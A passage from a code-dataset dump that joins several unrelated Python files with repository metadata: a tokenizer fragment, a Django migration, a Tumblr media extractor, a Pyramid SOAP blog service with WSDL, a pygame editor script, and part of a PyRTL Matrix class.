# The last EOS was spurious, but we ARE mid-word.
tok_list.pop(-1)
after = afters.pop(-1)
afters[-1] += after
return tok_list, afters
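# Rough usage sketch (exact sentence splits depend on the Punkt model, so
# the output shown is approximate):
#
#   toks, afters = tokenize("Hello world. Bye.")
#   # toks   ~ ['<D>', '<P>', '<S>', 'Hello', 'world', '.', '</S>',
#   #           '<S>', 'Bye', '.', '</S>']
#   # afters holds the skipped gaps (whitespace etc.) between emitted tokens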
|
mit
| 1,327,267,331,160,409,600
| 34.011765
| 102
| 0.552755
| false
| 3.256018
| false
| false
| false
|
derdmitry/socraticqs2
|
mysite/psa/migrations/0003_auto_20150420_0308.py
|
1
|
1092
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('default', '0001_initial'),
('psa', '0002_usersession'),
]
operations = [
migrations.CreateModel(
name='SecondaryEmail',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('email', models.EmailField(max_length=75, verbose_name=b'Secondary Email')),
('provider', models.ForeignKey(to='default.UserSocialAuth')),
('user', models.ForeignKey(related_name='secondary', to=settings.AUTH_USER_MODEL)),
],
options={
},
bases=(models.Model,),
),
migrations.AlterUniqueTogether(
name='secondaryemail',
unique_together=set([('provider', 'email')]),
),
]
|
apache-2.0
| -710,191,695,645,804,500
| 32.090909
| 114
| 0.576923
| false
| 4.512397
| false
| false
| false
|
lilydjwg/you-get
|
src/you_get/extractors/tumblr.py
|
1
|
4239
|
#!/usr/bin/env python
__all__ = ['tumblr_download']
from ..common import *
from .universal import *
from .dailymotion import dailymotion_download
from .vimeo import vimeo_download
from .vine import vine_download
def tumblr_download(url, output_dir='.', merge=True, info_only=False, **kwargs):
if re.match(r'https?://\d+\.media\.tumblr\.com/', url):
universal_download(url, output_dir, merge=merge, info_only=info_only)
return
html = parse.unquote(get_html(url)).replace('\/', '/')
feed = r1(r'<meta property="og:type" content="tumblr-feed:(\w+)" />', html)
if feed in ['photo', 'photoset', 'entry'] or feed is None:
# try to extract photos
page_title = r1(r'<meta name="description" content="([^"\n]+)', html) or \
r1(r'<meta property="og:description" content="([^"\n]+)', html) or \
r1(r'<title>([^<\n]*)', html)
urls = re.findall(r'(https?://[^;"&]+/tumblr_[^;"]+_\d+\.jpg)', html) +\
re.findall(r'(https?://[^;"&]+/tumblr_[^;"]+_\d+\.png)', html) +\
re.findall(r'(https?://[^;"&]+/tumblr_[^";]+_\d+\.gif)', html)
tuggles = {}
for url in urls:
filename = parse.unquote(url.split('/')[-1])
title = '.'.join(filename.split('.')[:-1])
tumblr_id = r1(r'^tumblr_(.+)_\d+$', title)
quality = int(r1(r'^tumblr_.+_(\d+)$', title))
ext = filename.split('.')[-1]
size = int(get_head(url)['Content-Length'])
if tumblr_id not in tuggles or tuggles[tumblr_id]['quality'] < quality:
tuggles[tumblr_id] = {
'title': title,
'url': url,
'quality': quality,
'ext': ext,
'size': size,
}
if tuggles:
size = sum([tuggles[t]['size'] for t in tuggles])
print_info(site_info, page_title, None, size)
if not info_only:
for t in tuggles:
title = tuggles[t]['title']
ext = tuggles[t]['ext']
size = tuggles[t]['size']
url = tuggles[t]['url']
print_info(site_info, title, ext, size)
download_urls([url], title, ext, size,
output_dir=output_dir)
return
# feed == 'audio' or feed == 'video' or feed is None
# try to extract video / audio
real_url = r1(r'source src=\\x22([^\\]+)\\', html)
if not real_url:
real_url = r1(r'audio_file=([^&]+)&', html)
if real_url:
real_url = real_url + '?plead=please-dont-download-this-or-our-lawyers-wont-let-us-host-audio'
if not real_url:
real_url = r1(r'<source src="([^"]*)"', html)
if not real_url:
iframe_url = r1(r'<iframe[^>]+src=[\'"]([^\'"]*)[\'"]', html)
if iframe_url[:2] == '//': iframe_url = 'http:' + iframe_url
if re.search(r'player\.vimeo\.com', iframe_url):
vimeo_download(iframe_url, output_dir, merge=merge, info_only=info_only,
referer='http://tumblr.com/', **kwargs)
return
elif re.search(r'dailymotion\.com', iframe_url):
dailymotion_download(iframe_url, output_dir, merge=merge, info_only=info_only, **kwargs)
return
elif re.search(r'vine\.co', iframe_url):
vine_download(iframe_url, output_dir, merge=merge, info_only=info_only, **kwargs)
return
else:
iframe_html = get_content(iframe_url)
real_url = r1(r'<source src="([^"]*)"', iframe_html)
title = unescape_html(r1(r'<meta property="og:title" content="([^"]*)" />', html) or
r1(r'<meta property="og:description" content="([^"]*)" />', html) or
r1(r'<title>([^<\n]*)', html) or url.split("/")[4]).replace('\n', '')
type, ext, size = url_info(real_url)
print_info(site_info, title, type, size)
if not info_only:
download_urls([real_url], title, ext, size, output_dir, merge = merge)
site_info = "Tumblr.com"
download = tumblr_download
download_playlist = playlist_not_supported('tumblr')
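# Illustrative usage sketch (not part of the original extractor). This function
# is normally driven by you-get's CLI, but it can be called directly; the URL
# below is hypothetical.
#
#   tumblr_download('https://example.tumblr.com/post/123456789',
#                   output_dir='/tmp', info_only=True)
#   # info_only=True prints the title/format/size without downloading.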
|
mit
| 514,626,946,501,440,450
| 42.255102
| 106
| 0.513565
| false
| 3.296267
| false
| false
| false
|
mikeckennedy/consuming_services_python_demos
|
services/consuming_services_apis/consuming_services_apis/api/blog_soap.py
|
1
|
17656
|
from datetime import datetime
from pyramid.httpexceptions import exception_response
from pyramid.view import view_config
from pyramid.response import Response
from xml.etree import ElementTree
from consuming_services_apis import Post
from consuming_services_apis.data.memory_db import MemoryDb
@view_config(route_name='soap')
def blog_posts(request):
print("Processing {} request from {} for the SOAP service: {}, ua: {}".format( # noqa
request.method, get_ip(request), request.url, request.user_agent
))
if "WSDL" in request.GET or "wsdl" in request.GET:
return Response(body=build_wsdl(request), content_type='application/xml') # noqa
action = request.headers.get('Soapaction').replace('http://tempuri.org/', '').lower().strip("\"") # noqa
if action == 'getpost':
body = clean_namespaces(request.body.decode('utf-8'))
dom = ElementTree.fromstring(body)
return get_post_response(dom, request)
if action == 'allposts':
return all_post_response(request)
if action == 'createpost':
body = clean_namespaces(request.body.decode('utf-8'))
print("CREATE VIA:" + body)
dom = ElementTree.fromstring(body)
return create_post(dom, request)
if action == 'updatepost':
body = clean_namespaces(request.body.decode('utf-8'))
print("UPDATE VIA:" + body)
dom = ElementTree.fromstring(body)
return update_post(dom, request)
if action == 'deletepost':
body = clean_namespaces(request.body.decode('utf-8'))
dom = ElementTree.fromstring(body)
return delete_post_response(dom, request)
print("BODY: {}".format(request.body.decode('utf-8')))
return Response("<TEST />")
def all_post_response(request):
posts = MemoryDb.get_posts(get_ip(request))
post_template = """
<Post>
<Id>{}</Id>
<Title>{}</Title>
<Published>{}</Published>
<Content>{}</Content>
<ViewCount>{}</ViewCount>
</Post>"""
posts_fragments = [
post_template.format(p.id, p.title, p.published, p.content, p.view_count) # noqa
for p in posts
]
resp_xml = """<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<AllPostsResponse xmlns="http://tempuri.org/">
<AllPostsResult>
{}
</AllPostsResult>
</AllPostsResponse>
</soap:Body>
</soap:Envelope>""".format("\n".join(posts_fragments)) # noqa
return Response(body=resp_xml, content_type='text/xml')
def get_post_response(dom, request):
id_text = dom.find('Body/GetPost/id').text
post = MemoryDb.get_post(id_text, get_ip(request))
if not post:
raise exception_response(404)
resp_xml = """<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetPostResponse xmlns="http://tempuri.org/">
<GetPostResult>
<Id>{}</Id>
<Title>{}</Title>
<Published>{}</Published>
<Content>{}</Content>
<ViewCount>{}</ViewCount>
</GetPostResult>
</GetPostResponse>
</soap:Body>
</soap:Envelope>""".format(post.id, post.title, post.published, post.content, post.view_count) # noqa
return Response(body=resp_xml, content_type='text/xml')
def delete_post_response(dom, request):
id_text = dom.find('Body/DeletePost/id').text
post = MemoryDb.get_post(id_text, get_ip(request))
if not post:
raise exception_response(404)
if MemoryDb.is_post_read_only(post.id):
raise exception_response(403)
MemoryDb.delete_post(post, get_ip(request))
resp_xml = """<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<DeletePostResponse xmlns="http://tempuri.org/" />
</soap:Body>
</soap:Envelope>""" # noqa
return Response(body=resp_xml, content_type='text/xml')
def create_post(dom, request):
title = dom.find('Body/CreatePost/title').text
content = dom.find('Body/CreatePost/content').text
view_count = int(dom.find('Body/CreatePost/viewCount').text)
now = datetime.now()
published = "{}-{}-{}".format(now.year, str(now.month).zfill(2), str(now.day).zfill(2)) # noqa
post = Post(
title,
content,
view_count,
published
)
trim_post_size(post)
MemoryDb.add_post(post, get_ip(request))
resp_xml = """<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<CreatePostResponse xmlns="http://tempuri.org/">
<CreatePostResult>
<Id>{}</Id>
<Title>{}</Title>
<Published>{}</Published>
<Content>{}</Content>
<ViewCount>{}</ViewCount>
</CreatePostResult>
</CreatePostResponse>
</soap:Body>
</soap:Envelope>""".format(post.id, post.title, post.published, post.content, post.view_count) # noqa
return Response(body=resp_xml, content_type='text/xml')
def update_post(dom, request):
post_id = dom.find('Body/UpdatePost/id').text
post = MemoryDb.get_post(post_id, get_ip(request))
if not post:
raise exception_response(404)
if MemoryDb.is_post_read_only(post_id):
raise exception_response(403)
post.title = dom.find('Body/UpdatePost/title').text
post.content = dom.find('Body/UpdatePost/content').text
post.view_count = int(dom.find('Body/UpdatePost/viewCount').text)
resp_xml = """<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UpdatePostResponse xmlns="http://tempuri.org/">
<UpdatePostResult>
<Id>{}</Id>
<Title>{}</Title>
<Published>{}</Published>
<Content>{}</Content>
<ViewCount>{}</ViewCount>
</UpdatePostResult>
</UpdatePostResponse>
</soap:Body>
</soap:Envelope>""".format(post.id, post.title, post.published, post.content, post.view_count) # noqa
return Response(body=resp_xml, content_type='text/xml')
def get_ip(request):
# The real IP is stripped by nginx and the direct request
# looks like a call from localhost. I've configured nginx
# to pass the IP it sees under the header X-Real-IP.
proxy_pass_real_ip = request.headers.get('X-Real-IP')
if proxy_pass_real_ip:
return proxy_pass_real_ip
elif request.remote_addr:
return request.remote_addr
else:
return request.client_addr
def clean_namespaces(body):
return (
body.replace('SOAP-ENV:', '')
.replace('xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"', '') # noqa
.replace('xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"', '') # noqa
.replace('xmlns:ns0="http://schemas.xmlsoap.org/soap/envelope/"', '') # noqa
.replace('xmlns:ns1="http://tempuri.org/"', '')
.replace('xmlns:ns0="http://tempuri.org/"', '')
.replace('xmlns:ns1="http://schemas.xmlsoap.org/soap/envelope/"', '') # noqa
.replace('xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"', '') # noqa
.replace('soap:', '')
.replace('xmlns:xsd="http://www.w3.org/2001/XMLSchema"', '')
.replace('xmlns="http://tempuri.org/"', '')
.replace('SOAP-ENV:', '')
.replace('ns0:', '')
.replace('ns1:', '')) # noqa
def build_wsdl(request):
wsdl = """
<wsdl:definitions xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:mime="http://schemas.xmlsoap.org/wsdl/mime/" xmlns:tns="http://tempuri.org/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:s="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://schemas.xmlsoap.org/wsdl/soap12/" xmlns:http="http://schemas.xmlsoap.org/wsdl/http/" xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/" targetNamespace="http://tempuri.org/">
<wsdl:types>
<s:schema elementFormDefault="qualified" targetNamespace="http://tempuri.org/">
<s:element name="AllPosts">
<s:complexType/>
</s:element>
<s:element name="AllPostsResponse">
<s:complexType>
<s:sequence>
<s:element minOccurs="0" maxOccurs="1" name="AllPostsResult" type="tns:ArrayOfPost"/>
</s:sequence>
</s:complexType>
</s:element>
<s:complexType name="ArrayOfPost">
<s:sequence>
<s:element minOccurs="0" maxOccurs="unbounded" name="Post" nillable="true" type="tns:Post"/>
</s:sequence>
</s:complexType>
<s:complexType name="Post">
<s:sequence>
<s:element minOccurs="0" maxOccurs="1" name="Id" type="s:string"/>
<s:element minOccurs="0" maxOccurs="1" name="Title" type="s:string"/>
<s:element minOccurs="1" maxOccurs="1" name="Published" type="s:string"/>
<s:element minOccurs="0" maxOccurs="1" name="Content" type="s:string"/>
<s:element minOccurs="1" maxOccurs="1" name="ViewCount" type="s:int"/>
</s:sequence>
</s:complexType>
<s:element name="GetPost">
<s:complexType>
<s:sequence>
<s:element minOccurs="0" maxOccurs="1" name="id" type="s:string"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name="GetPostResponse">
<s:complexType>
<s:sequence>
<s:element minOccurs="0" maxOccurs="1" name="GetPostResult" type="tns:Post"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name="CreatePost">
<s:complexType>
<s:sequence>
<s:element minOccurs="0" maxOccurs="1" name="title" type="s:string"/>
<s:element minOccurs="0" maxOccurs="1" name="content" type="s:string"/>
<s:element minOccurs="1" maxOccurs="1" name="viewCount" type="s:int"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name="CreatePostResponse">
<s:complexType>
<s:sequence>
<s:element minOccurs="0" maxOccurs="1" name="CreatePostResult" type="tns:Post"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name="UpdatePost">
<s:complexType>
<s:sequence>
<s:element minOccurs="0" maxOccurs="1" name="id" type="s:string"/>
<s:element minOccurs="0" maxOccurs="1" name="title" type="s:string"/>
<s:element minOccurs="0" maxOccurs="1" name="content" type="s:string"/>
<s:element minOccurs="1" maxOccurs="1" name="viewCount" type="s:int"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name="UpdatePostResponse">
<s:complexType>
<s:sequence>
<s:element minOccurs="0" maxOccurs="1" name="UpdatePostResult" type="tns:Post"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name="DeletePost">
<s:complexType>
<s:sequence>
<s:element minOccurs="0" maxOccurs="1" name="id" type="s:string"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name="DeletePostResponse">
<s:complexType/>
</s:element>
</s:schema>
</wsdl:types>
<wsdl:message name="AllPostsSoapIn">
<wsdl:part name="parameters" element="tns:AllPosts"/>
</wsdl:message>
<wsdl:message name="AllPostsSoapOut">
<wsdl:part name="parameters" element="tns:AllPostsResponse"/>
</wsdl:message>
<wsdl:message name="GetPostSoapIn">
<wsdl:part name="parameters" element="tns:GetPost"/>
</wsdl:message>
<wsdl:message name="GetPostSoapOut">
<wsdl:part name="parameters" element="tns:GetPostResponse"/>
</wsdl:message>
<wsdl:message name="CreatePostSoapIn">
<wsdl:part name="parameters" element="tns:CreatePost"/>
</wsdl:message>
<wsdl:message name="CreatePostSoapOut">
<wsdl:part name="parameters" element="tns:CreatePostResponse"/>
</wsdl:message>
<wsdl:message name="UpdatePostSoapIn">
<wsdl:part name="parameters" element="tns:UpdatePost"/>
</wsdl:message>
<wsdl:message name="UpdatePostSoapOut">
<wsdl:part name="parameters" element="tns:UpdatePostResponse"/>
</wsdl:message>
<wsdl:message name="DeletePostSoapIn">
<wsdl:part name="parameters" element="tns:DeletePost"/>
</wsdl:message>
<wsdl:message name="DeletePostSoapOut">
<wsdl:part name="parameters" element="tns:DeletePostResponse"/>
</wsdl:message>
<wsdl:portType name="BlogSoap">
<wsdl:operation name="AllPosts">
<wsdl:input message="tns:AllPostsSoapIn"/>
<wsdl:output message="tns:AllPostsSoapOut"/>
</wsdl:operation>
<wsdl:operation name="GetPost">
<wsdl:input message="tns:GetPostSoapIn"/>
<wsdl:output message="tns:GetPostSoapOut"/>
</wsdl:operation>
<wsdl:operation name="CreatePost">
<wsdl:input message="tns:CreatePostSoapIn"/>
<wsdl:output message="tns:CreatePostSoapOut"/>
</wsdl:operation>
<wsdl:operation name="UpdatePost">
<wsdl:input message="tns:UpdatePostSoapIn"/>
<wsdl:output message="tns:UpdatePostSoapOut"/>
</wsdl:operation>
<wsdl:operation name="DeletePost">
<wsdl:input message="tns:DeletePostSoapIn"/>
<wsdl:output message="tns:DeletePostSoapOut"/>
</wsdl:operation>
</wsdl:portType>
<wsdl:binding name="BlogSoap" type="tns:BlogSoap">
<soap:binding transport="http://schemas.xmlsoap.org/soap/http"/>
<wsdl:operation name="AllPosts">
<soap:operation soapAction="http://tempuri.org/AllPosts" style="document"/>
<wsdl:input>
<soap:body use="literal"/>
</wsdl:input>
<wsdl:output>
<soap:body use="literal"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name="GetPost">
<soap:operation soapAction="http://tempuri.org/GetPost" style="document"/>
<wsdl:input>
<soap:body use="literal"/>
</wsdl:input>
<wsdl:output>
<soap:body use="literal"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name="CreatePost">
<soap:operation soapAction="http://tempuri.org/CreatePost" style="document"/>
<wsdl:input>
<soap:body use="literal"/>
</wsdl:input>
<wsdl:output>
<soap:body use="literal"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name="UpdatePost">
<soap:operation soapAction="http://tempuri.org/UpdatePost" style="document"/>
<wsdl:input>
<soap:body use="literal"/>
</wsdl:input>
<wsdl:output>
<soap:body use="literal"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name="DeletePost">
<soap:operation soapAction="http://tempuri.org/DeletePost" style="document"/>
<wsdl:input>
<soap:body use="literal"/>
</wsdl:input>
<wsdl:output>
<soap:body use="literal"/>
</wsdl:output>
</wsdl:operation>
</wsdl:binding>
<wsdl:binding name="BlogSoap12" type="tns:BlogSoap">
<soap12:binding transport="http://schemas.xmlsoap.org/soap/http"/>
<wsdl:operation name="AllPosts">
<soap12:operation soapAction="http://tempuri.org/AllPosts" style="document"/>
<wsdl:input>
<soap12:body use="literal"/>
</wsdl:input>
<wsdl:output>
<soap12:body use="literal"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name="GetPost">
<soap12:operation soapAction="http://tempuri.org/GetPost" style="document"/>
<wsdl:input>
<soap12:body use="literal"/>
</wsdl:input>
<wsdl:output>
<soap12:body use="literal"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name="CreatePost">
<soap12:operation soapAction="http://tempuri.org/CreatePost" style="document"/>
<wsdl:input>
<soap12:body use="literal"/>
</wsdl:input>
<wsdl:output>
<soap12:body use="literal"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name="UpdatePost">
<soap12:operation soapAction="http://tempuri.org/UpdatePost" style="document"/>
<wsdl:input>
<soap12:body use="literal"/>
</wsdl:input>
<wsdl:output>
<soap12:body use="literal"/>
</wsdl:output>
</wsdl:operation>
<wsdl:operation name="DeletePost">
<soap12:operation soapAction="http://tempuri.org/DeletePost" style="document"/>
<wsdl:input>
<soap12:body use="literal"/>
</wsdl:input>
<wsdl:output>
<soap12:body use="literal"/>
</wsdl:output>
</wsdl:operation>
</wsdl:binding>
<wsdl:service name="Blog">
<wsdl:port name="BlogSoap" binding="tns:BlogSoap">
<soap:address location="{0}/soap"/>
</wsdl:port>
<wsdl:port name="BlogSoap12" binding="tns:BlogSoap12">
<soap12:address location="{0}/soap"/>
</wsdl:port>
</wsdl:service>
</wsdl:definitions>""".format(request.host_url) # noqa
return wsdl
def trim_post_size(post):
text_limit = 500
if post.content and len(post.content) > text_limit:
post.content = post.content[:500]
if post.title and len(post.title) > text_limit:
post.title = post.title[:500]
if post.published and len(post.published) > text_limit:
post.published = post.published[:500]
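# Illustrative client sketch (not part of the original service): invoking the
# AllPosts operation with the third-party `requests` library. The host and port
# are hypothetical; the dispatch above keys off the SOAPAction header.
#
#   import requests
#   envelope = '''<?xml version="1.0" encoding="utf-8"?>
#   <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
#     <soap:Body><AllPosts xmlns="http://tempuri.org/" /></soap:Body>
#   </soap:Envelope>'''
#   resp = requests.post('http://localhost:6543/soap',
#                        data=envelope,
#                        headers={'Content-Type': 'text/xml',
#                                 'SOAPAction': 'http://tempuri.org/AllPosts'})
#   print(resp.text)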
|
mit
| 3,373,341,063,547,171,000
| 35.706861
| 503
| 0.632023
| false
| 3.304511
| false
| false
| false
|
zenieldanaku/DyDCreature_Editor
|
main.py
|
1
|
1129
|
from sys import exit
from pygame import display as pantalla, event
from pygame import init as py_init, quit as py_quit
from azoe.engine import EventHandler
from azoe.widgets import NamedValue
from backend.entidad import Entidad
py_init()
fondo = pantalla.set_mode((400, 400))
event.set_blocked([12, 13])
entity = Entidad()
initiative = NamedValue('Iniciativa')
initiative.rect.top = entity.caracteristicas['DES'].name.rect.bottom + 2
entity.iniciativa.valor.rect.topleft = initiative.rect.right + 2, initiative.rect.top
EventHandler.add_widget(initiative)
EventHandler.add_widget(entity.iniciativa.valor)
EventHandler.add_widget(entity.caracteristicas['DES'].name)
EventHandler.add_widget(entity.caracteristicas['DES'].punt)
EventHandler.add_widget(entity.caracteristicas['DES'].mod)
EventHandler.currentFocus = entity.caracteristicas['DES'].punt
hayCambios = True
while hayCambios:
fondo.fill((255, 255, 255))
entity.update()
events = event.get()
hayCambios = EventHandler.update(events, fondo)
if hayCambios:
pantalla.update(hayCambios)
py_quit()
exit()
|
mit
| -6,875,978,619,516,324,000
| 28.513514
| 85
| 0.741364
| false
| 2.986772
| false
| false
| false
|
UCSBarchlab/PyRTL
|
pyrtl/rtllib/matrix.py
|
1
|
54553
|
from functools import reduce
from six.moves import builtins
from pyrtl.rtllib import multipliers as mult
from ..wire import Const, WireVector
from ..corecircuits import as_wires, concat, select
from ..pyrtlexceptions import PyrtlError
from ..helperfuncs import formatted_str_to_val
class Matrix(object):
''' Class for making a Matrix using PyRTL.
Provides the ability to perform different matrix operations.
'''
# Internally, this class uses a Python matrix of WireVectors.
# So, a Matrix is represented as follows for a 2 x 2:
# [[WireVector, WireVector], [WireVector, WireVector]]
def __init__(self, rows, columns, bits, signed=False, value=None, max_bits=64):
''' Constructs a Matrix object.
:param int rows: the number of rows in the matrix. Must be greater than 0
:param int columns: the number of columns in the matrix. Must be greater than 0
        :param int bits: The number of bits per wirevector. Must be greater than 0
:param bool signed: Currently not supported (will be added in the future)
:param (WireVector/list) value: The value you want to initialize the Matrix with.
If a WireVector, must be of size `rows * columns * bits`. If a list, must have
`rows` rows and `columns` columns, and every element must fit in `bits` size.
If not given, the matrix initializes to 0
        :param int max_bits: The maximum number of bits each wirevector can have; even
            when operations like adding two matrices together would produce larger
            wirevectors, results are truncated to this width
:return: a constructed Matrix object
'''
if not isinstance(rows, int):
raise PyrtlError('Rows must be of type int, instead "%s" '
'was passed of type %s' %
(str(rows), type(rows)))
if rows <= 0:
raise PyrtlError('Rows cannot be less than or equal to zero. '
'Rows value passed: %s' % str(rows))
if not isinstance(columns, int):
raise PyrtlError('Columns must be of type int, instead "%s" '
'was passed of type %s' %
(str(columns), type(columns)))
if columns <= 0:
raise PyrtlError('Columns cannot be less than or equal to zero. '
'Columns value passed: %s' % str(columns))
if not isinstance(bits, int):
raise PyrtlError('Bits must be of type int, instead "%s" '
'was passed of type %s' %
(str(bits), type(bits)))
if bits <= 0:
raise PyrtlError(
'Bits cannot be negative or zero, '
'instead "%s" was passed' % str(bits))
if max_bits is not None:
if bits > max_bits:
bits = max_bits
self._matrix = [[0 for _ in range(columns)] for _ in range(rows)]
if value is None:
for i in range(rows):
for j in range(columns):
self._matrix[i][j] = Const(0)
elif isinstance(value, WireVector):
if value.bitwidth != bits * rows * columns:
raise PyrtlError('Initialized bitwidth value does not match '
'given value.bitwidth: %s, expected: %s'
'' % (str(value.bitwidth),
str(bits * rows * columns)))
for i in range(rows):
for j in range(columns):
start_index = (j * bits) + (i * columns * bits)
self._matrix[rows - i - 1][columns - j - 1] =\
as_wires(value[start_index:start_index + bits], bitwidth=bits)
elif isinstance(value, list):
if len(value) != rows or any(len(row) != columns for row in value):
raise PyrtlError('Rows and columns mismatch\n'
'Rows: %s, expected: %s\n'
'Columns: %s, expected: %s'
'' % (str(len(value)), str(rows),
str(len(value[0])), str(columns)))
for i in range(rows):
for j in range(columns):
self._matrix[i][j] = as_wires(value[i][j], bitwidth=bits)
else:
raise PyrtlError('Initialized value must be of type WireVector or '
'list. Instead was passed value of type %s' % (type(value)))
self.rows = rows
self.columns = columns
self._bits = bits
self.bits = bits
self.signed = False
self.max_bits = max_bits
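    # Illustrative construction sketch (not part of the original class); the
    # values below are made up.
    #
    #   zeros = Matrix(2, 2, 4)                      # 2 x 2 matrix of Const(0)s
    #   from_list = Matrix(2, 2, 4, value=[[1, 2],
    #                                      [3, 4]])  # from a list of lists
    #   w = Const(0x4321, bitwidth=16)
    #   from_wire = Matrix(2, 2, 4, value=w)         # from a 16-bit WireVector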
@property
def bits(self):
''' Gets the number of bits each value is allowed to hold.
:return: an integer representing the number of bits
'''
return self._bits
@bits.setter
def bits(self, bits):
''' Sets the number of bits.
:param int bits: The number of bits. Must be greater than 0
Called automatically when bits is changed.
NOTE: This function will truncate the most significant bits.
'''
if not isinstance(bits, int):
raise PyrtlError('Bits must be of type int, instead "%s" '
'was passed of type %s' %
(str(bits), type(bits)))
if bits <= 0:
raise PyrtlError(
'Bits cannot be negative or zero, '
'instead "%s" was passed' % str(bits))
self._bits = bits
for i in range(self.rows):
for j in range(self.columns):
self._matrix[i][j] = self._matrix[i][j][:bits]
def __len__(self):
''' Gets the output WireVector length.
:return: an integer representing the output WireVector bitwidth
Used with default `len()` function
'''
return self.bits * self.rows * self.columns
def to_wirevector(self):
''' Outputs the PyRTL Matrix as a singular concatenated Wirevector.
:return: a Wirevector representing the whole PyRTL matrix
        For instance, if we had a 1 x 2 matrix `[[wire_a, wire_b]]` it would
return the concatenated wire: `wire = wire_a.wire_b`
'''
result = []
for i in range(len(self._matrix)):
for j in range(len(self._matrix[0])):
result.append(as_wires(self[i, j], bitwidth=self.bits))
return as_wires(concat(*result), bitwidth=len(self))
def transpose(self):
''' Constructs the transpose of the matrix
:return: a Matrix object representing the transpose
'''
result = Matrix(self.columns, self.rows, self.bits, max_bits=self.max_bits)
for i in range(result.rows):
for j in range(result.columns):
result[i, j] = self[j, i]
return result
def __reversed__(self):
''' Constructs the reverse of matrix
:return: a Matrix object representing the reverse
Used with the reversed() method
'''
result = Matrix(self.rows, self.columns, self.bits, max_bits=self.max_bits)
for i in range(self.rows):
for j in range(self.columns):
result[i, j] = self[self.rows - 1 - i, self.columns - 1 - j]
return result
def __getitem__(self, key):
''' Accessor for the matrix.
:param (int/slice row, int/slice column) key: The key value to get
:return: WireVector or Matrix containing the value of key
Called when using square brackets ([]).
Examples::
int_matrix = [[0, 1, 2], [3, 4, 5], [6, 7, 8]]
matrix = Matrix.Matrix(3, 3, 4, value=int_matrix)
matrix[1] == [3, 4, 5]
matrix[2, 0] == 6
            matrix[(2, 0)] == 6
matrix[slice(0, 2), slice(0, 3)] == [[0, 1, 2], [3, 4, 5]]
matrix[0:2, 0:3] == [[0, 1, 2], [3, 4, 5]]
matrix[:2] == [[0, 1, 2], [3, 4, 5]]
matrix[-1] == [6, 7, 8]
matrix[-2:] == [[3, 4, 5], [6, 7, 8]]
'''
if isinstance(key, tuple):
rows, columns = key
# First set up proper slice
if not isinstance(rows, slice):
if not isinstance(rows, int):
raise PyrtlError('Rows must be of type int or slice, '
'instead "%s" was passed of type %s' %
(str(rows), type(rows)))
if rows < 0:
rows = self.rows - abs(rows)
if rows < 0:
raise PyrtlError("Invalid bounds for rows. Max rows: %s, got: %s" % (
str(self.rows), str(rows)))
rows = slice(rows, rows + 1, 1)
if not isinstance(columns, slice):
if not isinstance(columns, int):
raise PyrtlError('Columns must be of type int or slice, '
'instead "%s" was passed of type %s' %
(str(columns), type(columns)))
if columns < 0:
columns = self.columns - abs(columns)
if columns < 0:
raise PyrtlError("Invalid bounds for columns. Max columns: %s, got: %s" % (
str(self.columns), str(columns)))
columns = slice(columns, columns + 1, 1)
if rows.start is None:
rows = slice(0, rows.stop, rows.step)
elif rows.start < 0:
rows = slice(self.rows - abs(rows.start),
rows.stop, rows.step)
if rows.stop is None:
rows = slice(rows.start, self.rows, rows.step)
elif rows.stop < 0:
rows = slice(rows.start, self.rows - abs(rows.stop),
rows.step)
rows = slice(rows.start, rows.stop, 1)
if columns.start is None:
columns = slice(0, columns.stop, columns.step)
elif columns.start < 0:
columns = slice(self.columns - abs(columns.start),
columns.stop, columns.step)
if columns.stop is None:
columns = slice(columns.start, self.columns, columns.step)
elif columns.stop < 0:
columns = slice(
columns.start, self.columns - abs(columns.stop),
columns.step)
columns = slice(columns.start, columns.stop, 1)
# Check slice bounds
if rows.start > self.rows or rows.stop > self.rows \
